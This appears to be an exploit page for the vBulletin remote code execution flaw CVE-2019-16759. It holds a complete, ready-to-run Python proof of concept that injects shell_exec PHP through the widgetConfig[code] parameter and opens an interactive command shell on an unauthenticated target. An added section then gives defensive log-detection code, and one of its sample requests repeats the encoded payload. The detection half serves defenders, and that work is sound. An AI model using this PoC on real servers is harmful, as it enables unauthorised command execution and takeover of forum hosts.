vBulletin RCE (CVE-2019-16759)

vBulletin versions 5.0.0 through 5.5.4 contain a vulnerability that allows an unauthenticated user to execute commands on the system (RCE) via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

POC

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <vBulletin URL>" % sys.argv[0])

url = sys.argv[1]


def do_cmd(url, cmd):
    # Route the request to the widget_php renderer and hand it PHP via widgetConfig[code]
    params = {
        'routestring': 'ajax/render/widget_php',
        'widgetConfig[code]': 'echo shell_exec(\'' + cmd + '\'); exit;'
    }
    r = requests.post(url=url, data=params)

    if r.status_code == 200:
        return r.text
    else:
        raise Exception('Cannot exploit target')


while True:
    try:
        cmd = input("> ")
        output = do_cmd(url, cmd)
        print(output)
    except KeyboardInterrupt:
        sys.exit("Closing shell...")
    except Exception as e:
        sys.exit(str(e))
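The same routestring/widgetConfig[code] pair that the PoC sends is what a defender should look for in web server or WAF logs. The following detection logic is an added example, not part of the original page: it decodes each request's query string and body, then flags only requests that both target the ajax/render/widget_php route and carry a widgetConfig[code] parameter. The sample requests are constructed for the example, and treating a route given in the URL path (rather than in routestring) as equivalent is an assumption.

```python
from urllib.parse import parse_qs

VULN_ROUTE = "ajax/render/widget_php"
INJECTED_KEY = "widgetConfig[code]"

# Constructed sample requests: (method, path, query_string, body).
# 0 and 1 mirror the CVE-2019-16759 pattern; 2 and 3 are benign.
SAMPLE_REQUESTS = [
    ("POST", "/", "",
     "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D="
     "echo+shell_exec%28%27id%27%29%3B+exit%3B"),
    ("GET", "/", "routestring=ajax/render/widget_php&widgetConfig[code]=phpinfo();", ""),
    ("GET", "/forum/", "routestring=forum/general", ""),
    ("POST", "/ajax/render/widget_php", "", "widgetConfig[title]=hello"),
]


def collect_params(query, body):
    """Merge URL-decoded parameters from the query string and the POST body."""
    params = {}
    for raw in (query, body):
        if raw:
            for key, values in parse_qs(raw, keep_blank_values=True).items():
                params.setdefault(key, []).extend(values)
    return params


def is_widget_php_exploit(method, path, query, body):
    """True when the request hits the widget_php route AND injects widgetConfig[code]."""
    params = collect_params(query, body)
    # Route may arrive as the routestring parameter or (assumption) as the URL path.
    route_hit = path.strip("/").endswith(VULN_ROUTE) or any(
        r.strip("/") == VULN_ROUTE for r in params.get("routestring", []))
    code_hit = INJECTED_KEY in params
    return route_hit and code_hit


def scan(requests):
    """Return the indices of requests matching the exploit pattern."""
    return [i for i, req in enumerate(requests) if is_widget_php_exploit(*req)]


if __name__ == "__main__":
    for i in scan(SAMPLE_REQUESTS):
        method, path, query, body = SAMPLE_REQUESTS[i]
        print("ALERT widget_php code injection: %s %s" % (method, path))
```

Requiring both conditions keeps ordinary widget_php renders (request 3) and unrelated routestring values (request 2) out of the alert stream.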